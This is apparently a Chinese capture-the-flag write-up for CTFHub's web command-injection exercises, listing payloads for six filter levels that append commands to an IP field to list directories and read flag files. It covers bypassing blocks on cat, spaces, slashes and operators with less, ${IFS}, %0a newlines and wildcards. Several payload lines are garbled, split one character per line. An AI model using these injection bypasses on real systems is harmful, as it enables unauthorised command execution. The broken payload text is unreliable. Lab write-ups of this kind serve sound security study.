ctfhub-web练习–>各种绕过
1.这题没有任何过滤
直接127.0.0.1;ls获取目录,找到flag,然后cat
flag在注释里面。
2.这题过滤了cat
百度下php类cat方法:
127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag
3.过滤空格
用
I
F
S
绕
过
127.0.0.1
;
c
a
t
{IFS}绕过 127.0.0.1;cat
IFS绕过127.0.0.1;cat{IFS}flag_1630334994276.php
4.过滤目录分隔符
先看看目录
127.0.0.1;ls
然后看看flag_is_here目录里面有什么
127.0.0.1;ls flag_is_here
有flag,但是不在当前目录下,所以切换目录就行了
127.0.0.1;cd \flag_is_here;cat flag_160862057427113.php
5.过滤运算符
过滤了| 和&
但是没有过滤 ; …
送分题
;ls;cat flag_17341506416268.php
6.组合拳
过滤了|,&,;,空格,cat,flag,ctfhub
这能难到我吗???
综合前面的
${IFS} -->空格
%0a(换行) --> ;
less --> cat
而且在url中提交才行
因为在输入框中提交会再进行url编码,意思就不是我们想要的了
先127.0.0.1%0als#看看目录
再127.0.0.1%0als${IFS}fla*#
看看有啥玩意
因为过滤了flag,所以要用fla*
然后127.0.0.1%0acd
I
F
S
f
l
a
∗
{IFS}fla*%0aless
IFSfla∗{IFS}fla*.php#获取flag
简便方法:
127.0.0.1%0acd
I
F
S
f
l
a
∗
{IFS}fla*%0aless
IFSfla∗{IFS}*.php#
因为根据前面几题都知道目录和flag都叫什么类型的名字了。。。。。。。